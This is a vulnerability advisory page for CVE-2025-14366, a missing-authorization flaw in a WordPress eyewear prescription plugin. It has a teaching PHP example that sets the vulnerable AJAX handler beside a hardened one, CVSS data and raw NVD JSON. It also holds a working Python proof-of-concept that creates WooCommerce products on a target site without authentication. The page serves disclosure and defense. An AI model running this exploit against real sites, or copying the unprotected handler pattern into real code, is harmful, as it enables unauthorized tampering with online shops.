Security Vulnerability Report
CVE-2025-14366 CVSS 5.3 MEDIUM

Published: 2025-12-13 16:16:49
Last Modified: 2026-04-15 00:35:42

Description

The Eyewear prescription form plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 6.0.1. This is due to missing authorization checks on the SubmitCatProductRequest AJAX action. This makes it possible for unauthenticated attackers to create arbitrary WooCommerce products with custom names, prices, and category assignments via the 'Name', 'Price', and 'Parent' parameters.
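The weakness class here (CWE-862, Missing Authorization) almost always looks the same in WordPress plugins: an AJAX handler is hooked on `wp_ajax_nopriv_*` so anonymous visitors can reach it, and the handler never asks who is calling. The following is an added, illustrative example written for this page, not the plugin's code from the referenced source lines; the function names, nonce action and WooCommerce capability are assumptions. It shows the anti-pattern the description implies beside a hardened handler for the same action.

```php
<?php
/*
 * Illustrative example (not the Eyewear prescription form plugin's code).
 * Function names, the nonce action string and the hook wiring are hypothetical.
 * Left: the CWE-862 anti-pattern behind a report like this one.
 * Right: the same handler with CSRF, authorization and input checks.
 */

// --- Vulnerable pattern -----------------------------------------------------
// Hooking the handler on wp_ajax_nopriv_* exposes it to anonymous visitors,
// and the handler then trusts the POST body outright: no nonce, no capability.
add_action( 'wp_ajax_SubmitCatProductRequest',        'example_submit_cat_product_vuln' );
add_action( 'wp_ajax_nopriv_SubmitCatProductRequest', 'example_submit_cat_product_vuln' );

function example_submit_cat_product_vuln() {
    $product = new WC_Product_Simple();
    $product->set_name( sanitize_text_field( wp_unslash( $_POST['Name'] ?? '' ) ) );
    $product->set_regular_price( wc_format_decimal( $_POST['Price'] ?? '' ) );
    $product->set_category_ids( array( absint( $_POST['Parent'] ?? 0 ) ) );
    $product->set_status( 'publish' );
    $id = $product->save(); // reachable by anyone who can POST to admin-ajax.php
    wp_send_json_success( array( 'product_id' => $id ) );
}

// --- Hardened pattern -------------------------------------------------------
// 1. Authenticated hook only: creating a catalog product is a privileged
//    operation, so there is no legitimate anonymous caller to serve.
add_action( 'wp_ajax_SubmitCatProductRequest', 'example_submit_cat_product_safe' );

function example_submit_cat_product_safe() {
    // 2. CSRF: the form must send a nonce created with
    //    wp_create_nonce( 'example_cat_product' ) in the 'nonce' field.
    //    check_ajax_referer() terminates the request when it does not match.
    check_ajax_referer( 'example_cat_product', 'nonce' );

    // 3. Authorization (the actual CWE-862 fix): only users who may publish
    //    WooCommerce products get past this point.
    if ( ! current_user_can( 'publish_products' ) ) {
        wp_send_json_error( array( 'message' => 'Forbidden' ), 403 );
    }

    $name   = sanitize_text_field( wp_unslash( $_POST['Name'] ?? '' ) );
    $price  = wc_format_decimal( $_POST['Price'] ?? '' );
    $parent = absint( $_POST['Parent'] ?? 0 );

    // 4. Validation: reject empty names, non-numeric or negative prices, and
    //    category IDs that are not existing product_cat terms.
    if ( '' === $name || ! is_numeric( $price ) || (float) $price < 0 ) {
        wp_send_json_error( array( 'message' => 'Invalid name or price' ), 400 );
    }
    if ( $parent && ! term_exists( $parent, 'product_cat' ) ) {
        wp_send_json_error( array( 'message' => 'Unknown category' ), 400 );
    }

    $product = new WC_Product_Simple();
    $product->set_name( $name );
    $product->set_regular_price( $price );
    if ( $parent ) {
        $product->set_category_ids( array( $parent ) );
    }
    // 5. Do not publish straight from a form submission; park it for review.
    $product->set_status( 'pending' );
    $id = $product->save();

    wp_send_json_success( array( 'product_id' => $id ) );
}
```

Two points worth noting when reviewing a fix of this kind: a nonce alone is not authorization (it only proves the request came from a page the site served, and `wp_ajax_nopriv_*` nonces are available to anyone who loads the form), and dropping the `nopriv` hook is the change that actually closes the unauthenticated path described in this report; the capability check covers logged-in low-privilege users such as subscribers or customers.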

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No CPE configuration data is available for this record.

Affected: Eyewear prescription form plugin for WordPress, all versions up to and including 6.0.1.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import sys

import requests

# CVE-2025-14366 PoC - Unauthenticated WooCommerce Product Creation
# Target: WordPress site with Eyewear prescription form plugin <= 6.0.1


def exploit(target_url, product_name="Malicious Product", price="99.99", parent_id="1"):
    """Exploit the missing authorization check on the SubmitCatProductRequest
    AJAX action, which lets an unauthenticated attacker create a WooCommerce
    product.

    Args:
        target_url: Base URL of the WordPress site (no trailing slash)
        product_name: Name of the product to create ('Name' parameter)
        price: Price of the product ('Price' parameter)
        parent_id: Category ID to assign the product to ('Parent' parameter)
    """
    # admin-ajax.php dispatches wp_ajax_nopriv_<action> for anonymous callers
    ajax_url = f"{target_url}/wp-admin/admin-ajax.php"

    # Payload for the vulnerable SubmitCatProductRequest AJAX action
    data = {
        "action": "SubmitCatProductRequest",
        "Name": product_name,
        "Price": price,
        "Parent": parent_id,
    }

    print(f"[*] Target: {target_url}")
    print("[*] Exploiting CVE-2025-14366...")
    print(f"[*] Creating product: {product_name} with price: {price}")

    try:
        # Send the request with no cookies and no nonce: fully unauthenticated
        response = requests.post(ajax_url, data=data, timeout=10)
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return False

    if response.status_code != 200:
        # WordPress answers an action with no nopriv hook with "0" and HTTP 400
        print(f"[-] Request failed with status: {response.status_code}")
        return False

    print("[+] Request sent successfully")
    print(f"[+] Response: {response.text[:200]}")

    # Loose heuristic only: the handler's response format is not documented,
    # so confirm the result in WooCommerce admin (Products) rather than trusting it
    if "success" in response.text.lower() or "1" in response.text:
        print("[!] Product may have been created - verify in WooCommerce admin")
        return True
    return False


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-14366.py <target_url>")
        print("Example: python cve-2025-14366.py http://example.com")
        sys.exit(1)

    target = sys.argv[1].rstrip("/")
    exploit(target)
```

References

https://plugins.trac.wordpress.org/browser/eyewear-prescription-form/tags/6.0.1/admin/class-eyewear_prescription_form-admin.php#L369
https://plugins.trac.wordpress.org/browser/eyewear-prescription-form/tags/6.0.1/admin/class-eyewear_prescription_form-admin.php#L71
https://www.wordfence.com/threat-intel/vulnerabilities/id/0f21d7a2-3b4f-487f-a64a-b963427233b3?source=cve

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-14366",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-13T16:16:48.633",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Eyewear prescription form plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 6.0.1. This is due to missing authorization checks on the SubmitCatProductRequest AJAX action. This makes it possible for unauthenticated attackers to create arbitrary WooCommerce products with custom names, prices, and category assignments via the 'Name', 'Price', and 'Parent' parameters."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-862"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/browser/eyewear-prescription-form/tags/6.0.1/admin/class-eyewear_prescription_form-admin.php#L369",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/browser/eyewear-prescription-form/tags/6.0.1/admin/class-eyewear_prescription_form-admin.php#L71",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/0f21d7a2-3b4f-487f-a64a-b963427233b3?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}
```